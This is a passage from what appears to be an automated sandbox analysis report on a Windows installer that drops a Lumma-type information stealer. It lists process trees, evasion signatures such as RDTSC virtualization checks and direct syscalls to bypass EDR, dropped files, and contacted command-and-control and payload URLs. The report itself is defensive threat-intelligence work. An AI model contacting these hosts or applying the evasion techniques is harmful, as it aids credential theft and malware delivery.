2 23->28         started        process13 file14 67 C:\Users\...\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, PE32 28->67 dropped 31 WPNMSIA79IRF0S6IHRZ7TIDHI.tmp 5 7 28->31         started        process15 file16 71 C:\Users\user\AppData\...\is-7IJ4L.tmp, PE32 31->71 dropped 73 C:\Users\user\...\BrightLib.exe (copy), PE32 31->73 dropped 75 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->77 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 1 31->37         started        39 cmd.exe 31->39         started        41 5 other processes 31->41 process17 signatures18 95 Tries to detect virtualization through RDTSC time measurements 34->95 97 Sample or dropped binary is a compiled AutoHotkey binary 34->97 99 Switches to a custom stack to bypass stack traces 34->99 101 Found direct / indirect Syscall (likely to bypass EDR) 34->101 43 conhost.exe 37->43         started        45 tasklist.exe 37->45         started        47 find.exe 37->47         started        49 conhost.exe 39->49         started        51 tasklist.exe 39->51         started        53 find.exe 39->53         started        55 conhost.exe 41->55         started        57 conhost.exe 41->57         started        59 11 other processes 41->59 process19

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Setup.exe14%VirustotalBrowse
              Setup.exe32%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe53%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp0%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-7IJ4L.tmp8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://abberanteusz.click/k0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtot100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtPE100%Avira URL Cloudmalware
              https://abberanteusz.click/u0%Avira URL Cloudsafe
              http://www.autohotkey.comCould0%Avira URL Cloudsafe
              https://abberanteusz.click/C0%Avira URL Cloudsafe
              https://abberanteusz.click/apiFil0%Avira URL Cloudsafe
              https://abberanteusz.click/0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txt8Q100%Avira URL Cloudmalware
              https://cegu.shop/HQ100%Avira URL Cloudmalware
              abberanteusz.click0%Avira URL Cloudsafe
              https://abberanteusz.click/api0%Avira URL Cloudsafe
              https://abberanteusz.click/#0%Avira URL Cloudsafe
              http://michaeluno.jp/40%Avira URL Cloudsafe
              http://crl.micro;q0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtR3SF100%Avira URL Cloudmalware
              https://abberanteusz.click/apig0%Avira URL Cloudsafe
              https://abberanteusz.click:443/api0%Avira URL Cloudsafe
              https://klipvumisui.shop/100%Avira URL Cloudmalware
              https://abberanteusz.click/api:0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                abberanteusz.click
                		172.67.198.102
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		104.21.37.128
                  		truefalse
                    		high
                    dfgh.online
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      rabidcowse.shopfalse
                        		high
                        abberanteusz.clicktrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://abberanteusz.click/apitrue
                        • Avira URL Cloud: safe
                        		unknown
                        cloudewahsj.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            abruptyopsn.shopfalse
                              		high
                              https://klipvumisui.shop/int_clp_sha.txtfalse
                                		high
                                wholersorie.shopfalse
                                  		high
                                  noisycuttej.shopfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSetup.exe, 00000000.00000003.1914615254.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1914700847.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000000.1971208181.0000000000841000.00000020.00000001.01000000.00000008.sdmpfalse
                                        		high
                                        https://abberanteusz.click/kSetup.exe, 00000000.00000003.1856495243.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://certs.securetrust.com/CA0:Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://abberanteusz.click/uSetup.exe, 00000000.00000003.1842376944.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://klipvumisui.shop/int_clp_sha.txtotSetup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://cegu.shop/8574262446/ph.txt8QSetup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://crl.usertrWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cegu.shop/Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://klipvumisui.shop/int_clp_sha.txtPESetup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://crl.vikingcloud.com/TWGCA.crl0tSetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://abberanteusz.click/Setup.exe, 00000000.00000003.1890502040.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://certs.securetrust.com/CA05Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.remobjects.com/psWPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.innosetup.com/WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drfalse
                                                            		high
                                                            https://certs.securetrust.com/CA0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.autohotkey.comCouldBrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1922557688.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://abberanteusz.click/CSetup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.certum.pl/CPS0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                  		high
                                                                  https://abberanteusz.click/apiFilSetup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cegu.shop/HQSetup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1974727785.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://www.innosetup.com/Setup.exefalse
                                                                    		high
                                                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://michaeluno.jp/4BrightLib.exe, 00000024.00000002.2452973399.00000000032E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://klipvumisui.shop/int_clp_sha.txtR3SFSetup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.certum.pl/ctnca.crl0kWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                            		high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://go.micropowershell.exe, 00000002.00000002.1922557688.0000000005B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore6lBkqpowershell.exe, 00000002.00000002.1922557688.0000000005311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.autohotkey.comBrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drfalse
                                                                                            		high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://abberanteusz.click/#Setup.exe, 00000000.00000003.1856495243.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://klipvumisui.shop/Setup.exe, 00000000.00000003.1972142744.00000000006BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      http://crl.micro;qpowershell.exe, 00000002.00000002.1920940710.000000000330A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crl.micropowershell.exe, 00000002.00000002.1921140476.000000000335F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.microsofSetup.exe, 00000000.00000003.1800048845.0000000003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.info-zip.org/BrightLib.exe, 00000024.00000002.2478910249.0000000039F72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.securetrust.com/0?Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSetup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://repository.certum.pl/cscasha2.cer0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                      		high
                                                                                                                      http://ocsp.sectigo.com0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                        		high
                                                                                                                        http://ocsp.vikingcloud.com/0ASetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://certs.securetrust.com/issuers/TWGCA.crt0Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ocsp.vikingcloud.com/0:Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://dfgh.online/invoker.php?compName=powershell.exe, 00000002.00000002.1920721795.00000000032C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://go.microspowershell.exe, 00000002.00000002.1922557688.0000000005726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.1829888737.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://crt.sectigo.com/SectigWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSetup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://subca.ocsp-certum.com01WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://contoso.com/powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://sectigo.com/CPS0DWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://dfgh.onlinepowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://jrsoftware.org0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://jrsoftware.org/WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://abberanteusz.click/apigSetup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1856495243.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.trustwave.com/TWGCA.crl0nSetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://sectigo.com/CPS0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://repository.certum.pl/ctnca.cer09WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://crl.securetrust.com/TWGCSCA_L1.crl0ySetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.certum.pl/CPS0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://crl.certum.pl/cscasha2.crl0qWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://cscasha2.ocsp-certum.com04WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                  		high
